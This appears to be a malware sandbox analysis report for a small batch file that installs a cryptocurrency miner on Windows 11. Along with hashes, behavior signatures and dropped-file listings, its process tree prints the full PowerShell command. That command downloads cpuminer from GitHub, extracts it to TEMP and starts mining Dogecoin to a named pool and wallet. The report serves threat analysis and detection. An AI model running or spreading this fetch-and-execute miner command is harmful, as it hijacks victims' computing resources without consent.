b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1793s
max time network
1795s
platform
windows11-21h2_x64
resource
win11-20231222-en
resource tags

arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system
submitted
01-02-2024 23:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	2408	powershell.exe
3	2408	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2264	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2264	cpuminer-sse2.exe
2264	cpuminer-sse2.exe
2264	cpuminer-sse2.exe
2264	cpuminer-sse2.exe
2264	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2408	powershell.exe
2408	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2408	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4168 wrote to memory of 2408	4168	cmd.exe	80
PID 4168 wrote to memory of 2408	4168	cmd.exe	80
PID 2408 wrote to memory of 4340	2408	powershell.exe	82
PID 2408 wrote to memory of 4340	2408	powershell.exe	82
PID 4340 wrote to memory of 2264	4340	cmd.exe	83
PID 4340 wrote to memory of 2264	4340	cmd.exe	83

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2408
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4340
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2264

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cq5uxrdf.eht.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
2.1MB

MD5
3fe0325b8ad30254357c2b1372972f80

SHA1
3738f46f23bdde5038996314aa869e4ae7f9c4a1

SHA256
d9f336d995236f451663727a2fc1bb951cec517712839dd65cf8e132426b52ca

SHA512
1e582bbac0dbd6dce793b2b5bc2e61c81803b8dddfa1124fe7405a60c2988d7de99586da9efd9ce328723db13420d6f661545bc2fe1aa4783d7c228f01d99284

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.9MB

MD5
1024ed04a2a051abf364f1179de1fe20

SHA1
952815444c26e893d645427895fbdef514c86f80

SHA256
92c0d484e8d958a27e84c00be5bf3ebd8e4ba592a24e3f607b4584946ddb2c23

SHA512
dfec891c600f21f32a40277fe7a3ab8975d63581dc173da7cbf4dbe6f636ad9646a301c3d86e45464cba746c8fa0799df01fded7081c152e647f7aa875921312

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
570KB

MD5
82e88bd85afa97c7e8f30990300658b0

SHA1
0c9720579851d8fc237bc9cc35cbd0517c89bafc

SHA256
a077bfaef07cf4b9b2044071e5aaf643c868d2041e9e89c9a613ca299113ad25

SHA512
fea4840b951cf11a3d8a25f7f1f4c2148d266950c31b38c5c48d01ea7640d5993aebf8f898d62f7f42804a9c03ea5acd4df6e98bd1f340a8d8d763622e64cbb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
799KB

MD5
de4a233a139b1c31bbfab1973128a079

SHA1
67b6885ceab58c665a9e85ca52cfbb21529eda12

SHA256
f7cf1199402febe6398ba8cc7885b9fd6a9845ab5d45807f576e79821433fbdc

SHA512
5e885697191f56d249c20dc292dd5d0a4a3cdb9161502aa31d456564c751f487014db60ce2d14a33acc1232acfb06a1cfa7549a23688746ddf8f784488bb0de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
74b7078fa12e872db2bfb83b5571d760

SHA1
aa1a72b9816b1f9d6ca7f150cef3e619f55605f8

SHA256
b21c18abab9eb334e5d9e66189069f789ab82f98038bfa48e466aff5035afc66

SHA512
617da40a9e7fe6ea6a34bd905f1a5556820b0701c9b1ffadf334bcefb2bcfb6e431887e2aaff3c47433e15f464c5bd3957108e151d185d7706aae0e61caac161

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
620KB

MD5
efee8856795638bdefc2460711ff1559

SHA1
f3817c08eea488fa904d5984fdd55d901137c5cb

SHA256
5fdf7c6ba63cdcbe4e42b4e87b727595f477cd6363575b9abbe591046ef2a729

SHA512
275e7282a6c472199cf725972e8353a55daa71e1ef93f57322d5cf94eebf66a3dad7ba915e8fb999022484df2a783d9e08b9e29223abcdab898f4c63b041e96c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.1MB

MD5
b83a17f17cb1ede069e3b8daa2e4b034

SHA1
ed389cae07ad731159f9b1efaec42c63bc74e9ee

SHA256
aeb4df75234dfb3fbceb55d96cc3f90d64d5c268224c46cb80c17e2da6d22ca6

SHA512
7321092f9a9e90c05764ee502e6fcc203867e21b255507c5c03147c8811134cbc6ea0ff0836e456dced36981f9cdce6c65fedf1393cb5e1b0774d4c79c21252b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.4MB

MD5
7b80343c9782c12911b66467e7ea8c47

SHA1
e8ff01947f55ee3a300ba7763da4ab2e16fb9e8e

SHA256
9d33270f8c6ff62f5c81c7ea55af7e35885413c977e9c0155cc800eb6e2062e8

SHA512
9df09f213003833c0878ff0846f2c4ccaa2289e3f995885f5ee65645df281af0bf3ebf413144a26ac59297ed9bb7df681600f66bf7a65aef675cdf7fe111d433

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.2MB

MD5
9f258b02267911f613bb064f02629d42

SHA1
572f915a41530d6753970bab9c87a4543a5953d7

SHA256
b7a9ec998672532493ef6dbc081e6514ce9940918d9720f523751d4dd0e4cf7f

SHA512
a21eedc075be3fbfe21ea31b236b677764626aad862d8e663ef4fad85af6a71c0dc0c7438566d839f334c7b6b92f39ac72f36018d3973fb38ba9c1d8ba34a80c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
573KB

MD5
923e6e33b1c027ddc00d88d5a6f7cfba

SHA1
a07efb96559588677f5fba4fed083c0341df58fe

SHA256
474c84ea28ca44d5ee319369ce8d5a5868e48b98a2f952bd15979249919148df

SHA512
ab5971dfba49b659c174d01157780be4066b8d0b1a18ccb4c6a2198206f91665c648e032d21b4d58efeb81ea344bd922e3b9fe294b69c365a4305bb5596c925d

Download Submit
memory/2264-73-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-128-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-123-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-118-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-113-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-108-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-103-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-93-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-68-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2264-69-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2264-70-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2264-71-0x000000006E020000-0x000000006E0B8000-memory.dmp

Filesize
608KB

Download
memory/2264-72-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/2264-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2408-9-0x00007FFC911D0000-0x00007FFC91C92000-memory.dmp

Filesize
10.8MB

Download
memory/2408-8-0x000002AAEAB10000-0x000002AAEAB32000-memory.dmp

Filesize
136KB

Download
memory/2408-10-0x000002AAEA9D0000-0x000002AAEA9E0000-memory.dmp

Filesize
64KB

Download
memory/2408-64-0x00007FFC911D0000-0x00007FFC91C92000-memory.dmp

Filesize
10.8MB

Download
memory/2408-11-0x000002AAEA9D0000-0x000002AAEA9E0000-memory.dmp

Filesize
64KB

Download
memory/2408-12-0x00007FFC911D0000-0x00007FFC91C92000-memory.dmp

Filesize
10.8MB

Download
memory/2408-13-0x000002AAEA9D0000-0x000002AAEA9E0000-memory.dmp

Filesize
64KB

Download
memory/2408-14-0x000002AAEA9D0000-0x000002AAEA9E0000-memory.dmp

Filesize
64KB

Download
memory/2408-16-0x000002AAEB010000-0x000002AAEB022000-memory.dmp

Filesize
72KB

Download
memory/2408-17-0x000002AAEAB80000-0x000002AAEAB8A000-memory.dmp

Filesize
40KB

Download